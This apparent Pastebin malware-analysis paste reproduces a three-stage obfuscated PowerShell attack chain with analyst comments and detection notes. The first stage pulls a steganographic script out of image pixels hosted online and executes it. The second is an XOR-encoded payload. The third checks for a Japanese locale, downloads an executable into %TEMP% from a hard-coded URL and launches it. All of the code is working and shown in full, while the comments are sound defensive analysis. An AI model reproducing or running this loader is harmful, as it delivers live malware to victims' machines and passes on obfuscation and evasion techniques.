dissectmalware

Mal code

Oct 31st, 2018
# https://twitter.com/DissectMalware/status/1057515530918248448

# Stage 1: loader that downloads an image file whose pixel data carries a
# malicious PowerShell script (steganographic payload). Code is unchanged from
# the paste; comments below are analyst notes.
#
# Obfuscation pattern used on this line (and in the later stages): every cmdlet,
# type and member name is rebuilt at run time with the -f format operator
# (e.g. "{2}{1}{0}" -f 'EM','IT','SET-' -> Set-Item) and invoked through & or .,
# and resolved types are parked in variables via Set-Item Variable:<name>, so
# none of the sensitive names appear literally in the script text.
# Resolved, in order of execution:
#   Set-Item Variable:2dG  [Math]
#   Set-Item Variable:dGNV [System.Text.Encoding]
#   Set-Alias a New-Object
#   Add-Type -AssemblyName System.Drawing
#   $g = New-Object System.Drawing.Bitmap((New-Object Net.WebClient).OpenRead(<https image URL assembled on this line>))
#   $o = New-Object Byte[] 4960
#   for row 0..7, col 0..619:
#       $o[row*620 + col] = [Math]::Floor((pixel.B -band 15) * 16) -bor (pixel.G -band 15)
#       -> one payload byte per pixel, hidden in the low nibble of the Blue (high half)
#          and Green (low half) channels; Floor is a no-op on these integers.
#   IEX ([System.Text.Encoding]::ASCII.GetString($o[0..4732]))   # runs the first 4733 recovered bytes
# Detection notes: Add-Type System.Drawing + Net.WebClient.OpenRead + GetPixel loop
# + Invoke-Expression in a single command, together with dense -f string assembly,
# is a strong indicator of this loader family; script-block logging records the
# text actually passed to IEX, which defeats the name-assembly obfuscation.
&("{2}{1}{0}" -f 'EM','IT','SET-')  ("{1}{2}{0}" -f'2dG','vA','riable:')  (  [TyPE]("{0}{1}"-F 'MAT','H')  );  .("{0}{1}{2}" -f 'sE','t-','itEM')  ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT')  )  ;  &("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)|&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA')  ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo  )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))
  6.  
  7.  
# Stage 2: the script recovered from the image pixels. It is a long integer
# list; each value is cast to [char] after -bxor 0x3B (the single-byte XOR key
# is passed as the string '0x3B' and coerced to 59), and the characters are
# joined into one string. The first values decode to the start of the Stage 3
# text below (31,64,117 -> '$','{','N'). This expression only builds the
# string; nothing on these lines invokes it.
# Detection notes: a [char[]] literal of hundreds of small integers piped
# through -bxor and -join is a recognisable single-byte-XOR decoder stub.
(([CHAr[]] ( 31,64,117,91, 110,118 , 72 ,70 , 6 ,21 ,19,25, 64 , 8, 70 , 64 , 9 ,70 , 64 , 10 , 70, 64 ,11 , 70 , 25, 27 ,22 ,93, 28 ,94,28 , 23, 28,79 , 78 ,73 ,28 , 23,28, 94 , 79, 22,120 , 78,87, 28, 23 , 28,124,28 , 18 ,27 , 71 ,27,21 , 19, 25,64 , 11,70 , 64 , 10, 70 , 64,9 ,70 , 25, 27 ,22 , 93,28, 125 , 28 ,23, 28,84, 73, 86, 90,79 , 22,119, 28 , 23 ,28 ,82,72 , 79 ,28 , 18 ,27 , 22 , 107 ,73 , 84,75, 94, 73, 79,66,27 , 19, 28,17 , 28 ,18,27 , 71 ,27 ,21 , 19,25,64 , 10 , 70 , 64, 11, 70,64 , 9 , 70 , 25,22 ,93, 27,28,22 , 104,79,73 ,82, 28 , 23,28 , 116 , 78, 79 ,28,23 ,28 ,85,92 ,28,18,27 ,22,104, 79,73 , 94 ,90 ,86, 0,82 , 93 ,27, 19 , 31, 64, 85 , 110,91, 118 ,104, 70 ,27,22, 118,90 , 79 ,88, 83, 27 , 25,81,90 ,25, 18 , 64, 31 ,64, 115, 91,94 ,72, 70,6 ,19 , 25 ,64,15, 70, 64, 11, 70,64 , 10 , 70, 64, 9,70, 64,8,70,25, 27, 22,93 , 28 , 79, 79 , 75, 1, 20, 20,28,23 ,28,86 , 90 ,28 ,23 , 28, 73, 79 ,94 , 28 , 23 , 28, 85, 84, 95 , 21, 88 , 84, 86,20,76,84 ,73,87, 95 , 79, 82 ,86,94 , 28 , 23 , 28 , 83 , 28,18, 23, 25 ,25 ,0, 93, 84 ,73 , 94, 90 ,88 , 83 , 19 ,31 ,64 ,110 ,91,105,87, 70,27 , 82 ,85 ,27,31 ,64, 115 ,91 ,94, 72 , 70,18, 64 , 111, 73 ,66 ,64 , 29,19 , 25,64,9 , 70 , 64 ,11, 70,64,10 , 70,25, 27,22 , 93 , 28,84 ,72,28,23, 28, 79 , 28, 23,28 , 76 ,73, 82,79, 94,22 ,115 , 28 ,18 ,27 ,31, 64 , 110 , 91,105 ,87 , 70,0 ,31,64 , 125, 80 ,70 , 27,6,27, 25,31,94, 85,77 , 1,79 ,94,86 ,75 , 103 ,89, 73 ,78 ,72, 83 ,21 , 94 ,67, 94 , 25, 0,29,19,25, 64,10 ,70 ,64 ,8 , 70 , 64 ,9 , 70 ,64,11,70 ,25,27, 22,93 , 28 ,22,115,84 ,72 , 79, 28 ,23, 28,108 , 28, 23 , 28, 94 ,28 ,23 , 28, 73, 82,79,28,18,27, 31,64 ,93, 91 ,112, 70 , 0 ,31,64, 124 , 125, 70,27, 6 , 27 ,21 ,19, 25,64 , 9,70 ,64 , 11 , 70 ,64 ,10, 70, 64,8,70, 25 ,27 , 22, 93,27,28, 94, 76,22 , 116 , 28,23 ,28 , 89 , 28,23 ,28 , 117, 28 ,23 , 28 , 81,94, 88,79 , 28,18 , 27,19,25,64 , 10 ,70,64,15, 70,64 , 14, 70 , 64 ,9, 70,64 ,13, 70,64 ,11 , 70 , 64,8 ,70, 25, 22,93 ,27 , 28 ,94 ,85, 28 , 
23,28,104 ,66, 28,23 , 28, 21 ,108 ,28 ,23, 28 ,79 , 28 , 23, 28, 72 , 79, 94,86 , 21 , 117 , 94, 28,23 , 28 , 79 , 28,23,28 ,94 ,89 , 120,87,82 , 28,18, 0, 31, 64,92 , 125, 70 ,21,25,115 ,126,91,122 ,95 , 94 ,105 ,104,25,21 ,19 ,25,64,10,70,64 , 11, 70 , 25,22,93 , 28 ,95 , 95,28 , 23, 28 ,122 ,28 ,18, 21,114, 85, 77, 84,80 ,94, 19 , 19 ,25 , 64,10 , 70 ,64,11 , 70, 64 , 9,70,25,22, 93,27, 28, 90 , 92 ,94,28 , 23, 28,78 , 72 ,94,73, 22 ,28, 23 ,28 , 85,79,28 ,18, 23,19 ,19,25, 64 , 9,15,70,64, 10,3,70, 64,9 ,11,70 , 64 ,14 , 70, 64 ,10 ,12, 70, 64,13,70,64,10,15 , 70,64, 11, 70, 64 ,8, 11, 70 ,64 ,10, 8 ,70, 64 , 9 , 13, 70 , 64 ,8,70, 64 ,9, 9,70 , 64, 10,10 ,70 , 64, 12, 70 ,64 ,10,70 , 64 , 10 , 11 , 70, 64 , 8,10 ,70 , 64 , 9,3,70,64 ,9 , 12, 70, 64 ,9 , 14,70 , 64, 10, 13 , 70 , 64, 9, 2, 70 ,64 ,10 , 2 , 70 ,64 ,9,8,70, 64, 9 , 10 ,70 , 64 , 10 , 9 , 70, 64,3, 70, 64 ,9 ,70 ,64 , 2 ,70, 64 , 15, 70 , 64 ,10,14 ,70, 25, 22 , 93 , 27, 28 , 84 , 76,72, 27, 28,23 , 28,108,28, 23 , 28 , 20, 28 ,23,28 , 104,18 , 28,23, 28,8 , 15, 21 , 28 , 23,28 , 90,20 , 14 ,21, 11, 27 ,19,108 , 82,85 ,95 ,84 , 76 , 72,27 ,117, 28 ,23 , 28 , 27 , 108 , 82, 85, 28, 23,28 ,87, 94,28,23 ,28,93 ,90 ,73,82, 28, 23 , 28, 14 ,28 ,23 , 28 , 94, 89 , 112, 82 , 79,20, 14 , 8 , 15,28, 23, 28,75 , 28, 23 , 28,21, 14,11 ,11,21 ,11, 27, 104 , 90,28 , 23, 28,78 , 72 , 28, 23,28, 95, 28 ,23 , 28, 13, 28 , 23,28 ,88 ,80 , 84 , 18, 27 , 120,28,23,28 , 111, 0 , 28 ,23, 28 ,84, 65 ,28 ,23 ,28 ,12 ,28 ,23 , 28 , 82, 87,87, 28, 23, 28 , 11, 28,23 , 28 , 27,122 ,75 ,28,23, 28, 21 , 28 ,23, 28, 118,28 , 23, 28 ,118 , 119 ,23,27, 87 , 82 , 80, 94, 27 ,124 ,94, 28 ,23 ,28, 22,110 ,28, 23 ,28, 112 ,115, 111, 28 ,23,28 , 13 , 27 , 19, 28, 23 , 28, 83 ,73 ,84, 86 , 94,20,28 , 23 , 28 ,117, 111 ,27 ,10 ,11 , 21 , 11, 0 ,27,28, 23, 28,21,28, 18 , 18 , 18, 0 , 31 ,64 , 92, 91 , 125,70 ,21,19, 25, 64, 10,70 ,64 ,9 , 70,64 ,8, 70,64 , 11,70 , 25 ,27 , 22,93,28,82,87 ,94 ,28 , 23,28,127 ,28 , 23 ,28,84 ,76 ,85, 87 
,84 ,90 , 95 ,28 , 23,28,125, 28,18,21,114, 85 ,77 ,84, 80 ,94,19, 31, 64,110,91 ,105, 87, 70 , 23 ,27 , 31 ,64, 93 , 80, 70, 18 , 0 ,29 , 19, 25 , 64, 10,70,64 ,9, 70 ,64,11, 70, 25, 27, 22 ,93,27,28,94,72, 72 ,28 ,23 , 28 , 104 , 79 , 90,73 , 28 , 23 , 28 ,79, 22,107 ,73, 84 ,88 ,28 ,18 ,27,31 ,64 , 93,80,70,0,89 , 73, 94 , 90 , 80, 70,120, 90,79 ,88 , 83 ,64 , 21,19 , 25 , 64 , 9 ,70 , 64 ,11 , 70 ,64 , 10 , 70 , 25 , 27,22 , 93,28,115 ,84 ,72 ,28, 23 , 28 ,79 ,28 ,23, 28 , 108, 73,82 , 79,94 ,22 ,28 ,18 , 27,31,64,100,70,21 ,25,126,67, 91, 120 , 94, 107 , 91, 111 , 82 , 84 ,85 , 25, 21, 25 ,118, 91, 126, 104, 72,90 ,124,94 ,25 , 70,70,70)|%{ [CHAr] ( $_ -BXOR'0x3B' )}) -Join'')
  11.  
  12.  
# Stage 3: the XOR-decoded payload. Same -f name assembly as Stage 1, plus
# backtick-split variable names (${N`UMs}, ${U`Rl}) to break simple greps.
# Resolved structure of this line:
#   $NUMs = Get-Culture | Format-List -Property * | Out-String -Stream
#   if ($NUMs -Match "ja") {             # gate: only proceeds when the culture output matches "ja"
#                                        # (likely a Japanese-locale check; other matches possible)
#     $Hes = "<hard-coded http URL assembled on this line>", ""
#     foreach ($URl in $Hes) {
#       Try {
#         Write-Host $URl
#         $Fk = "$env:temp\brush.exe"
#         Write-Host $Fk
#         $GF = New-Object System.Net.WebClient
#         $GF.Headers.Add("user-agent", <UA assembled on this line>)
#         $GF.DownloadFile($URl, $Fk)
#         Start-Process $Fk
#         break                          # stop after the first successful download+launch
#       } Catch { Write-Host $_.Exception.Message }
#     }
#   }
# The second $Hes element is an empty string, so if the first download fails the
# loop retries with an empty URL, which DownloadFile rejects and the Catch prints.
# Detection notes: culture/locale check -> WebClient.DownloadFile into $env:temp ->
# Start-Process of the dropped file is the behavioural chain to alert on; the file
# artefact is brush.exe under %TEMP%, and the assembled user-agent reads as an old
# Chrome/7.0 string with an unusual "Windows NT; Windows NT 10.0; us-US" platform
# token, which is itself a usable network indicator.
${N`UMs}=.("{3}{2}{1}{0}" -f'e','tur','et-Cul','G') | .("{0}{1}{2}" -f'F','ormat-L','ist') -Property ('*') | .("{1}{0}{2}"-f '-Stri','Out','ng') -Stream;if (${nU`MS} -Match "ja"){${H`es}=("{4}{0}{1}{2}{3}" -f'ttp://','ma','rte','nod.com/worldtime','h'),"";foreach(${U`Rl} in ${H`es}){Try{&("{2}{0}{1}" -f'os','t','write-H') ${U`Rl};${Fk} = "$env:temp\brush.exe";&("{1}{3}{2}{0}" -f'-Host','W','e','rit') ${f`K};${GF} = .("{2}{0}{1}{3}" -f 'ew-O','b','N','ject') ("{1}{4}{5}{2}{6}{0}{3}"-f 'en','Sy','.W','t','stem.Ne','t','ebCli');${gF}."HE`AdeRS".("{1}{0}"-f'dd','A').Invoke(("{1}{0}{2}"-f 'age','user-','nt'),(("{24}{18}{20}{5}{17}{6}{14}{0}{30}{13}{26}{3}{22}{11}{7}{1}{10}{31}{28}{27}{25}{16}{29}{19}{23}{21}{12}{8}{2}{9}{4}{15}"-f 'ows ','W','/','S)','34.','a/5.0 (Windows N',' Win','le','fari','5','ebKit/534','p','.500.0 Sa','us','d','6','cko) C','T;','oz','7','ill','0',' Ap','.','M','ML, like Ge','-U','KHT','6 (','hrome/','NT 10.0; ','.')));${g`F}.("{1}{2}{3}{0}" -f'ile','D','ownload','F').Invoke(${U`Rl}, ${fk});&("{1}{2}{0}" -f 'ess','Star','t-Proc') ${fk};break}Catch{.("{2}{0}{1}" -f'Hos','t','Write-') ${_}."Ex`CeP`Tion"."M`ESsaGe"}}}